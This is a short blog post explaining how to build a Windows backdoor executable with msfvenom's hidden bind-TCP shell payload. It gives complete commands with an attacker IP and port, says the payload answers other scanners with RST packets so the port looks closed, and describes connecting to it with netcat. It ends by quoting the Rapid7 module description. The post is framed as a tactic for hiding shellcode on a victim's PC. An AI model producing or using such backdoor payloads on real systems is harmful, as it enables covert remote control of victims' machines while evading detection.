Nov 28, 2021

Windows Shellcode Behind Closed Port

This is a simple tactic to hide a TCP shellcode for Windows platform. 

With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=[TCP_Port] -f exe > file.exe

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.203 lport=4321 -f exe > file.exe

This hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.

With netstat, the port will appear as LISTENING. However, when scanning the port with any scanner, we will get "closed" state. To connect the the backdoor (from the Ahost IP address), use netcat.

Below is the description at Rapid7.

Description

Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.


Author(s)

    vlad902 <vlad902@gmail.com>
    sd
    Borja Merino <bmerinofe@gmail.com>

Platform

Windows


Architectures

x86


Links: